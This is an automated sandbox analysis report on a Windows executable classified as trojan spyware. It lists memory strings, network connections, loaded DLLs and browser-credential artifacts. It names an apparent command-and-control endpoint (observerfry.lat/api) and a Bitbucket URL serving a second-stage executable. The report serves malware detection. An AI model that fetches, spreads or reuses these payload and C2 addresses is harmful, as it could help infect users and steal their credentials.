Source: SFtDA07UDr.exe, 00000000.00000003.2138520574.000000000171D000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138609621.000000000174B000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000002.2464326767.000000000171D000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138388755.000000000174A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: SFtDA07UDr.exe, 00000000.00000003.2138609621.000000000174B000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138388755.000000000174A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: SFtDA07UDr.exe, 00000000.00000003.2138609621.000000000174B000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138388755.000000000174A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: SFtDA07UDr.exe, 00000000.00000003.2138520574.000000000171D000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138609621.000000000174B000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000002.2464326767.000000000171D000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138388755.000000000174A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: SFtDA07UDr.exe, 00000000.00000003.1925427609.0000000005D25000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: SFtDA07UDr.exe, 00000000.00000003.2138609621.000000000174B000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138388755.000000000174A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: SFtDA07UDr.exe, 00000000.00000003.2138520574.000000000171D000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138609621.000000000174B000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000002.2464326767.000000000171D000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138388755.000000000174A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: SFtDA07UDr.exe, 00000000.00000003.1925427609.0000000005D25000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: SFtDA07UDr.exe, 00000000.00000003.1925427609.0000000005D25000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: SFtDA07UDr.exe, 00000000.00000003.1871718842.0000000005D1F000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872184057.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872934364.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: SFtDA07UDr.exe, 00000000.00000002.2465817210.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aui-cdn.atlassian.com/
Source: SFtDA07UDr.exe, 00000000.00000002.2465817210.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
Source: SFtDA07UDr.exe, 00000000.00000002.2465817210.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
Source: SFtDA07UDr.exe, 00000000.00000002.2465817210.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
Source: SFtDA07UDr.exe, 00000000.00000002.2465817210.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
Source: SFtDA07UDr.exe, 00000000.00000002.2465817210.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: SFtDA07UDr.exe, 00000000.00000002.2465817210.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
Source: SFtDA07UDr.exe, 00000000.00000002.2465817210.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
Source: SFtDA07UDr.exe, 00000000.00000003.2138520574.0000000001704000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
Source: SFtDA07UDr.exe, 00000000.00000002.2465817210.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-
Source: SFtDA07UDr.exe, 00000000.00000003.2138520574.000000000171D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3
Source: SFtDA07UDr.exe, 00000000.00000002.2464148316.00000000016A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443r
Source: SFtDA07UDr.exe, 00000000.00000002.2464148316.00000000016BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
Source: SFtDA07UDr.exe, 00000000.00000002.2463985214.00000000012FA000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0
Source: SFtDA07UDr.exe, 00000000.00000002.2464148316.00000000016A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org:443/mynewworkspace123312/scnd/downloads/FormattingCharitable.exeChrome/Default
Source: SFtDA07UDr.exe	String found in binary or memory: https://bridge.lga1.admarke
Source: SFtDA07UDr.exe, 00000000.00000003.1949866442.0000000005CD9000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1949295757.0000000005CD5000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1950046715.0000000005CDB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: SFtDA07UDr.exe, SFtDA07UDr.exe, 00000000.00000003.1949866442.0000000005CD9000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1949295757.0000000005CD5000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1950046715.0000000005CDB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: SFtDA07UDr.exe, 00000000.00000002.2465817210.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cookielaw.org/
Source: SFtDA07UDr.exe, 00000000.00000003.1871718842.0000000005D1F000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872184057.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872934364.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SFtDA07UDr.exe, 00000000.00000003.1871718842.0000000005D1F000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872184057.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872934364.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: SFtDA07UDr.exe, 00000000.00000003.1871718842.0000000005D1F000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872184057.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872934364.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SFtDA07UDr.exe, SFtDA07UDr.exe, 00000000.00000003.1949866442.0000000005CD9000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1949295757.0000000005CD5000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1950046715.0000000005CDB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: SFtDA07UDr.exe, 00000000.00000003.1949866442.0000000005CD9000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1949295757.0000000005CD5000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1950046715.0000000005CDB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: SFtDA07UDr.exe, 00000000.00000003.1871718842.0000000005D1F000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872184057.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872934364.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SFtDA07UDr.exe, 00000000.00000003.1871718842.0000000005D1F000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872184057.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872934364.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: SFtDA07UDr.exe, 00000000.00000003.1871718842.0000000005D1F000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872184057.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872934364.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SFtDA07UDr.exe, 00000000.00000002.2465895160.0000000005CF6000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138432899.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: SFtDA07UDr.exe, 00000000.00000003.1950046715.0000000005CDB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: SFtDA07UDr.exe, 00000000.00000003.1975922228.0000000005CDF000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1924893342.0000000005CDC000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1949295757.0000000005CD5000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1951074863.0000000005CDE000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1925246665.0000000005CDD000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1925412949.0000000005CDF000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1950046715.0000000005CDB000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1926458477.0000000005CDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat/
Source: SFtDA07UDr.exe, 00000000.00000003.2046022983.000000000169D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat/E
Source: SFtDA07UDr.exe, 00000000.00000002.2464395097.0000000001735000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1954876307.0000000001740000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1993373801.0000000001740000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138388755.000000000172B000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1955438629.0000000001740000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1902218493.0000000005CD6000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2046022983.00000000016BD000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1993180083.0000000001740000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1902705880.0000000005CD9000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1980257379.0000000001740000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat/api
Source: SFtDA07UDr.exe, 00000000.00000003.1954876307.0000000001740000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1993373801.0000000001740000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1955438629.0000000001740000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1993180083.0000000001740000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1980257379.0000000001740000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat/apiR
Source: SFtDA07UDr.exe, 00000000.00000003.2046022983.00000000016BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat/api~l
Source: SFtDA07UDr.exe, 00000000.00000003.2046022983.00000000016A3000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000002.2464148316.00000000016A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat:443/api
Source: SFtDA07UDr.exe, 00000000.00000003.2046022983.00000000016A3000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000002.2464148316.00000000016A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://observerfry.lat:443/apin.txtPK
Source: SFtDA07UDr.exe, 00000000.00000003.2138432899.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: SFtDA07UDr.exe, 00000000.00000003.2138432899.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: SFtDA07UDr.exe, 00000000.00000003.1874681721.0000000005D32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: SFtDA07UDr.exe, 00000000.00000003.1926488629.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: SFtDA07UDr.exe, 00000000.00000003.1926488629.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: SFtDA07UDr.exe, 00000000.00000003.1902301601.0000000005D2B000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1902180890.0000000005D2B000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1874681721.0000000005D32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: SFtDA07UDr.exe, 00000000.00000003.1874769883.0000000005D06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: SFtDA07UDr.exe, 00000000.00000003.1902301601.0000000005D2B000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1902180890.0000000005D2B000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1874681721.0000000005D32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: SFtDA07UDr.exe, 00000000.00000003.1874769883.0000000005D06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: SFtDA07UDr.exe, 00000000.00000002.2465895160.0000000005CF6000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138432899.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138629427.0000000005CDF000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000002.2465817210.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: SFtDA07UDr.exe, 00000000.00000003.2138629427.0000000005CDF000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000002.2465817210.0000000005CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-websiteX-Frame-OptionsSAMEORIGINX-
Source: SFtDA07UDr.exe	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575
Source: SFtDA07UDr.exe, 00000000.00000003.1949866442.0000000005CD9000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1949295757.0000000005CD5000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1950046715.0000000005CDB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: SFtDA07UDr.exe, 00000000.00000003.1871718842.0000000005D1F000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872184057.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872934364.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: SFtDA07UDr.exe, SFtDA07UDr.exe, 00000000.00000003.1949866442.0000000005CD9000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1949295757.0000000005CD5000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1950046715.0000000005CDB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: SFtDA07UDr.exe, 00000000.00000003.2138520574.000000000171D000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138609621.000000000174B000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000002.2464326767.000000000171D000.00000004.00000020.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.2138388755.000000000174A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: SFtDA07UDr.exe, 00000000.00000003.1871718842.0000000005D1F000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872184057.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp, SFtDA07UDr.exe, 00000000.00000003.1872934364.0000000005D1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: SFtDA07UDr.exe, 00000000.00000003.1926488629.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: SFtDA07UDr.exe, 00000000.00000003.1926488629.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: SFtDA07UDr.exe, 00000000.00000003.1926488629.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: SFtDA07UDr.exe, 00000000.00000003.1926488629.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: SFtDA07UDr.exe, 00000000.00000003.1926488629.0000000005DF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.201:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 16.182.108.137:443 -> 192.168.2.4:49745 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: SFtDA07UDr.exe	Static PE information: section name:
Source: SFtDA07UDr.exe	Static PE information: section name: .rsrc
Source: SFtDA07UDr.exe	Static PE information: section name: .idata

Source: C:\Users\user\Desktop\SFtDA07UDr.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 2044

Source: SFtDA07UDr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: SFtDA07UDr.exe

Static PE information: Section: ZLIB complexity 0.9995212928921569

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@2/5@3/3

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5576

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\e48c02fa-7691-4dcc-86e8-29d947c88016

Jump to behavior

Source: C:\Users\user\Desktop\SFtDA07UDr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SFtDA07UDr.exe, 00000000.00000003.1875640034.0000000005CD5000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: SFtDA07UDr.exe

ReversingLabs: Detection: 55%

Source: SFtDA07UDr.exe

String found in binary or memory: "app.update.lastUpdateTime.recipe-client-addon-run", 1696333830); user_pref("app.update.lastUpdateTime.region-update-timer", 0); user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856); user_pref("app.update.lastUpdateTime.xpi-signatur

Source: C:\Users\user\Desktop\SFtDA07UDr.exe

File read: C:\Users\user\Desktop\SFtDA07UDr.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SFtDA07UDr.exe "C:\Users\user\Desktop\SFtDA07UDr.exe"
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 2044

Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SFtDA07UDr.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
